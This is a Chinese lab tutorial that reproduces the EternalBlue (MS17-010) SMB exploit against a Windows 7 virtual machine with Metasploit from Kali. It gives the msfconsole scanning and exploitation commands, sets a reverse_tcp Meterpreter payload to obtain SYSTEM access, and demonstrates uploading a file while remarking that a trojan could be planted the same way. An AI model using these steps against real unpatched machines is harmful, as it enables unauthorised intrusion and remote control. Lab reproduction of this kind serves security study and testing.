# 利用 msf 渗透攻击 win7(永恒之蓝漏洞 ms17-010)

# 前言

永恒之蓝是指 2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含 “永恒之蓝” 工具,“永恒之蓝” 利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造 “永恒之蓝” 制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

存在漏洞的主机,只需要开放 445 端口即可被攻击,获取系统最高权限

# 环境

kali ip:192.168.232.129

windows7 ip:192.168.232.131

# 工具

Metasploit Framework (MSF) 是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit 可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以 “可以黑掉整个宇宙” 之名。刚开始的 Metasploit 是采用 Perl 语言编写的,但是再后来的新版中,改成了用 Ruby 语言编写的了。在 kali 中,自带了 Metasploit 工具。

# ms17-010 漏洞复现

1. 安装 win7 并查看本机 ip

kali 利用 nmap 扫描 win7ip

发现开启了 445 端口,利用该端口进行攻击

2. 启动 msf 进行漏洞探测

h
#利用命令
	msfconsole  #进入 msf
	search ms17-010 #查找 msf17-010 漏洞模块


利用 use [对应的模块序号] 命令即可查看对应漏洞模块

为了使用 scanner 模块,这里我们输入 use 3 接着输入 info 命令来查看 ms17-010 漏洞信息

接下来使用 scanner 模块检测主机是否存在漏洞

输入命令 show options

在上面的图里可以看到 Required 为是否需要参数, yes 表示需要参数,若改选项对应参数为空则需要我们来输入参数

发现 RHOST 参数对应为空,其参数是被攻击主机的 IP,需要我们输入

输入命令 set rhosts 192.168.232.131

再次输入 show options , 可以看到已经设置好了 RHOSTS

使用 run 命令进行扫描攻击,运行结果显示可能会遭受 ms17-010 攻击

3. 漏洞利用

回到开始选择漏洞模块的地方

输入 use 0 来选择 永恒之蓝

输入 set payload windows/x64/meterpreter/reverse_tcp 来设置 payload 的连接方式,使我们的 win7 主动发起连接,通过这种方式拿到权限

接下来需要设置我们的攻击 ip,按顺序输入 show optionsset rhosts 192.168.232.131

接下来使用 run 命令即可执行攻击

出现返回的 meterpreter 时我们就得到了 win7 的 system 权限

【Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传 / 下载文件、创建持久后门等。】

这里进行文件上传的演示

在 kali 中创建一个文件(cumt.txt), 编辑内容

meterpreter 会话下输入命令 upload cumt.txt c:// , 将文件上传到 win7 主机的 C 盘下

查看 win7 主机,发现文件夹中多了一个 cumt.txt 文件,内容确实是我在 kali 中写入的相同

通过这种方式我们也可以在对应主机里写入木马并上传进行利用

到此永恒之蓝漏洞就复现完成了

参考:

https://zhuanlan.zhihu.com/p/453081910

https://blog.csdn.net/qq_44159028/article/details/104044002

https://blog.csdn.net/ElsonHY/article/details/109939420

漏洞原理:

https://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772